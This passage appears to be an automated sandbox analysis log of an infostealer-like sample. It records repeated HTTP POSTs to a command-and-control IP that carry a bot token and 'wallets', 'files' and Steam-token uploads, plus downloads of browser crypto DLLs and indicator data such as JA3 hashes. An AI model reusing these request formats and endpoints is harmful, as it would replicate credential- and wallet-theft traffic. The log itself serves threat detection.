Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAECFCAAEBFHIEHDGHHost: 185.172.128.151Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 38 66 64 62 32 34 34 34 35 37 33 64 31 39 33 31 61 39 37 62 30 37 34 36 31 65 35 38 35 32 31 38 39 33 35 33 34 35 63 66 32 62 35 32 32 61 30 38 65 35 64 33 33 34 36 39 32 35 36 62 63 37 34 39 32 30 31 32 31 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 2d 2d 0d 0a Data Ascii: ------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="token"028fdb2444573d1931a97b07461e585218935345cf2b522a08e5d33469256bc74920121a------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="file"------AECAECFCAAEBFHIEHDGH--
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBKFHIDHIIJJKECGHCFHost: 185.172.128.151Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 42 4b 46 48 49 44 48 49 49 4a 4a 4b 45 43 47 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 38 66 64 62 32 34 34 34 35 37 33 64 31 39 33 31 61 39 37 62 30 37 34 36 31 65 35 38 35 32 31 38 39 33 35 33 34 35 63 66 32 62 35 32 32 61 30 38 65 35 64 33 33 34 36 39 32 35 36 62 63 37 34 39 32 30 31 32 31 61 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 4b 46 48 49 44 48 49 49 4a 4a 4b 45 43 47 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 4b 46 48 49 44 48 49 49 4a 4a 4b 45 43 47 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 4b 46 48 49 44 48 49 49 4a 4a 4b 45 43 47 48 43 46 2d 2d 0d 0a Data Ascii: ------BFBKFHIDHIIJJKECGHCFContent-Disposition: form-data; name="token"028fdb2444573d1931a97b07461e585218935345cf2b522a08e5d33469256bc74920121a------BFBKFHIDHIIJJKECGHCFContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------BFBKFHIDHIIJJKECGHCFContent-Disposition: form-data; name="file"------BFBKFHIDHIIJJKECGHCF--
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/freebl3.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/mozglue.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/msvcp140.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/nss3.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/softokn3.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/vcruntime140.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIIIJDHJEGIECBGHIJEHost: 185.172.128.151Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDBFIEGIDGIECBKJECHost: 185.172.128.151Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 38 66 64 62 32 34 34 34 35 37 33 64 31 39 33 31 61 39 37 62 30 37 34 36 31 65 35 38 35 32 31 38 39 33 35 33 34 35 63 66 32 62 35 32 32 61 30 38 65 35 64 33 33 34 36 39 32 35 36 62 63 37 34 39 32 30 31 32 31 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 2d 2d 0d 0a Data Ascii: ------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="token"028fdb2444573d1931a97b07461e585218935345cf2b522a08e5d33469256bc74920121a------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="message"wallets------CFHDBFIEGIDGIECBKJEC--
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCFHDHIIIECBGCAKFIJHost: 185.172.128.151Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 46 48 44 48 49 49 49 45 43 42 47 43 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 38 66 64 62 32 34 34 34 35 37 33 64 31 39 33 31 61 39 37 62 30 37 34 36 31 65 35 38 35 32 31 38 39 33 35 33 34 35 63 66 32 62 35 32 32 61 30 38 65 35 64 33 33 34 36 39 32 35 36 62 63 37 34 39 32 30 31 32 31 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 44 48 49 49 49 45 43 42 47 43 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 44 48 49 49 49 45 43 42 47 43 41 4b 46 49 4a 2d 2d 0d 0a Data Ascii: ------AFCFHDHIIIECBGCAKFIJContent-Disposition: form-data; name="token"028fdb2444573d1931a97b07461e585218935345cf2b522a08e5d33469256bc74920121a------AFCFHDHIIIECBGCAKFIJContent-Disposition: form-data; name="message"files------AFCFHDHIIIECBGCAKFIJ--
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDGDAAKFHIEHIECAFBAAHost: 185.172.128.151Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDGHJEHJJDAAAKEBGCFHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIDHIIJKEBGHJJKFIDAHost: 185.172.128.151Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAECFCAAECBGDGDHIEHJHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHJKEBAAEBGCAAEBFHHost: 185.172.128.151Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKECAAAFHJECAAAEBFCHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDBGDHIIDAEBFHJJDBFHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHCBAEHJJJKKFIDGHJEHost: 185.172.128.151Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAFHDHCBGDGCBGCGIIHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFHJKEBAAECBFHIECGIHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDAEHDAKECGCAKFCFIJHost: 185.172.128.151Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBKJDBAAKJDGCBFHCFCHost: 185.172.128.151Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIJJDGDHDGDAKFIECFIHost: 185.172.128.151Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGHCAKKFBGDHJJJKECFHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKJKFHCAEGDHIDGDHDAHost: 185.172.128.151Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBAAAKFCAFIIDHIDGHIEHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCBGDHIEBFHCBFHDHDHHost: 185.172.128.151Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIECGCBKFHIEBGHDBKHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKJKFHCAEGDHIDGDHDAHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAFCAFHJJDBFIECFBKEHost: 185.172.128.151Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEGIDHDHIDGIEBGIJEHHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKFHIEGDHJKECAAKKEHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJJEGDBFIIDGCAKJEBKHost: 185.172.128.151Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHIJEBKEBGHIDHJKJEGHost: 185.172.128.151Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDBFBFCBFBKECAAKJKFHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFCAAEBGCAKKFIDBKJJHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKKFHCFIECAAAKEGCFIHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBAFBGIDHCBFHIECFCBHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHIJEBKEBGHIDHJKJEGHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDBFBFCBFBKECAAKJKFHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFCAAEBGCAKKFIDBKJJHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKJEBAAECBGDHIECAKJHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHCHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAECFHJEBAAFIEBGHIIEHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJEGCBKKJECBGCGDBAHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDBKKJKJEBFBGCBAAFIHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCFHDAKECFIDGDGDBKJHost: 185.172.128.151Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 46 48 44 41 4b 45 43 46 49 44 47 44 47 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 38 66 64 62 32 34 34 34 35 37 33 64 31 39 33 31 61 39 37 62 30 37 34 36 31 65 35 38 35 32 31 38 39 33 35 33 34 35 63 66 32 62 35 32 32 61 30 38 65 35 64 33 33 34 36 39 32 35 36 62 63 37 34 39 32 30 31 32 31 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 48 44 41 4b 45 43 46 49 44 47 44 47 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 48 44 41 4b 45 43 46 49 44 47 44 47 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 48 44 41 4b 45 43 46 49 44 47 44 47 44 42 4b 4a 2d 2d 0d 0a Data Ascii: ------EGCFHDAKECFIDGDGDBKJContent-Disposition: form-data; name="token"028fdb2444573d1931a97b07461e585218935345cf2b522a08e5d33469256bc74920121a------EGCFHDAKECFIDGDGDBKJContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------EGCFHDAKECFIDGDGDBKJContent-Disposition: form-data; name="file"------EGCFHDAKECFIDGDGDBKJ--
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFCBKJDBFIJKFHIIDAAHost: 185.172.128.151Content-Length: 86947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKJEBAAECBGDHIECAKJHost: 185.172.128.151Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 42 41 41 45 43 42 47 44 48 49 45 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 38 66 64 62 32 34 34 34 35 37 33 64 31 39 33 31 61 39 37 62 30 37 34 36 31 65 35 38 35 32 31 38 39 33 35 33 34 35 63 66 32 62 35 32 32 61 30 38 65 35 64 33 33 34 36 39 32 35 36 62 63 37 34 39 32 30 31 32 31 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 42 41 41 45 43 42 47 44 48 49 45 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 42 41 41 45 43 42 47 44 48 49 45 43 41 4b 4a 2d 2d 0d 0a Data Ascii: ------KKKJEBAAECBGDHIECAKJContent-Disposition: form-data; name="token"028fdb2444573d1931a97b07461e585218935345cf2b522a08e5d33469256bc74920121a------KKKJEBAAECBGDHIECAKJContent-Disposition: form-data; name="message"jbdtaijovg------KKKJEBAAECBGDHIECAKJ--
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.172.128.151 185.172.128.151
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NADYMSS-ASRU NADYMSS-ASRU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49727 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00404C70
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
